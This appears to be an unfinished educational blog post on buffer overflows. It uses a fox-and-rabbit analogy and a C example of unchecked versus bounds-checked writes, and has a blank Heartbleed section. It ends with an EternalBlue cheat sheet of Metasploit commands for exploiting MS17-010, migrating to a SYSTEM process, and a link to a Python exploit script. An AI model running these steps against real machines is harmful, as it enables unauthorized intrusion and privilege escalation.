
Buffer Overflow

Overview

The idea of a buffer overflow attack is quite simple, though the implementation might initially be difficult to digest. I am exploring this notion and visualising it in this article.

Mechanics

Imagine you have a job you don’t really like (I think most of us have had such an experience at least once in our life 😢). And also, imagine that you are being highly underpaid. Your job is simple and ridiculous: place rabbits 🐇 into one set of boxes and foxes 🦊 - into another. You happen to have 6 boxes 📦📦📦📦📦📦 for foxes 🦊 and 4 📦📦📦📦 for rabbits 🐇. However, you were given 4 rabbits 🐇🐇🐇🐇 and 7 foxes 🦊🦊🦊🦊🦊🦊🦊. So, one fox 🦊 doesn’t have its fox box 📦. However, there are also rabbit 🐇 boxes 📦 right nearby. So, even though you were explicitly told not to place foxes into rabbit boxes and vice versa, since you don’t give a shit, you put a fox into a rabbit box. What happens? One can only guess… 🤔. Long story short: the fox eats the rabbit, and now you have 7 foxes and only 3 rabbits 🐇. Alas! If only you’d followed the manual 📖…. Most likely, one would get fired after such a mistake, but we can’t fire the compiler, so this is exactly what happens when the developer is not using a memory-safe language or is not careful enough about bounds: data written past the end of one buffer lands in whatever sits next to it in memory. Now, to the technicalities.
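The same story in C, as an added example that is not from the original post: ten boxes sit side by side in one contiguous row (6 fox boxes, then 4 rabbit boxes, all constructed here), an unchecked writer trusts the caller's count and the seventh fox lands in the first rabbit box, while the bounds-checked writer refuses the request. The `yard`, `place_foxes_*` and `rabbits_left` names are assumptions made for this illustration.

```c
#include <string.h>

/* Constructed layout: ten boxes in one contiguous row, exactly as in the
 * analogy. The first 6 bytes are fox boxes, the next 4 are rabbit boxes. */
#define FOX_BOXES    6
#define RABBIT_BOXES 4

struct yard {
    char boxes[FOX_BOXES + RABBIT_BOXES];
};

static char *fox_boxes(struct yard *y)    { return y->boxes; }
static char *rabbit_boxes(struct yard *y) { return y->boxes + FOX_BOXES; }

/* Unsafe: trusts the caller's count. With n == 7 the loop writes
 * fox_boxes(y)[6], which is the very same byte as rabbit_boxes(y)[0]. */
static void place_foxes_unchecked(struct yard *y, int n) {
    char *f = fox_boxes(y);
    for (int i = 0; i < n; i++)
        f[i] = 'F';
}

/* Safe: check the count against the buffer size before writing anything;
 * a request the fox boxes cannot hold is rejected rather than spilled. */
static int place_foxes_checked(struct yard *y, int n) {
    if (n < 0 || n > FOX_BOXES)
        return -1;
    char *f = fox_boxes(y);
    for (int i = 0; i < n; i++)
        f[i] = 'F';
    return 0;
}

/* Fill the 4 rabbit boxes, place n foxes with or without the bounds check,
 * and return how many rabbits survive (-1 if the checked writer refused). */
static int rabbits_left(int n, int use_check) {
    struct yard y;
    memset(fox_boxes(&y), '.', FOX_BOXES);
    memset(rabbit_boxes(&y), 'R', RABBIT_BOXES);
    if (use_check) {
        if (place_foxes_checked(&y, n) != 0)
            return -1;
    } else {
        place_foxes_unchecked(&y, n);
    }
    int alive = 0;
    for (int i = 0; i < RABBIT_BOXES; i++)
        if (rabbit_boxes(&y)[i] == 'R')
            alive++;
    return alive;
}
```

With 7 foxes the unchecked writer leaves 3 rabbits, as in the story; the checked writer returns -1 and the rabbits are untouched.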

💔 Heartbleed

This is about … .

Eternal Blue

It’s basically a buffer overflow vulnerability in the SMB module.

References

https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

📕 RTFM

nmap --script vuln <ip>
msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target IP>
exploit
# you will get a session if the system is vulnerable

ps # list processes, choose the one with System permissions if your permissions are not enough

migrate <pid> # try different PIDs

Python exploit script - https://github.com/3ndG4me/AutoBlue-MS17-010/blob/master/eternalblue_exploit10.py.